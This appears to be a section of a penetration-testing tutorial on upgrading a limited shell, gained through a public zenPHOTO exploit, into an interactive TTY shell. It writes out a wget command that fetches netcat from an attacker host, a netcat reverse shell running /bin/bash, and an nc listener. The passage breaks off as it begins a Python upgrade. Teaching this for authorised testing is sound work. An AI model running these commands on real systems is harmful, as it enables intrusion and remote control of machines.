Spawning a TTY Shell
We have covered different types of privilege escalation. Now let's look at some examples on how to get a TTY shell on this system. A TTY showcases a simple text output environment, that allows us to type commands and get the output.
How to do it...
- Let's look at the following example, where we have a web application running
zenPHOTO
:
data:image/s3,"s3://crabby-images/d738f/d738f95c7e1790fa9fa1076e41c8467b33582593" alt=""
- The
zenPHOTO
already has a public exploit running, which we get access to via a limited shell:
data:image/s3,"s3://crabby-images/e672c/e672c92ac454d860c8eb3b16622064d4ee7b73b9" alt=""
- Since this is a limited shell, we try to escape it and get a reverse connection by first uploading
netcat
on the system and then usingnetcat
to gain a backconnect:
wget x.x.x.x/netcat –o /tmp/netcat
data:image/s3,"s3://crabby-images/c15bc/c15bc92669204385f900ffc753387a975f4a7a3f" alt=""
- Now we can backconnect using the following command:
netcat <our IP > -e /bin/bash <port number>
data:image/s3,"s3://crabby-images/04aea/04aeac451f11cb570da3748107d0f4ad2d81bebc" alt=""
- Looking at our Terminal window, where we had our listener setup, we will see a successful connection:
nc –lnvp <port number>
data:image/s3,"s3://crabby-images/95556/955564409ee7c476255aac690d23f29b83d85016" alt=""
Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it...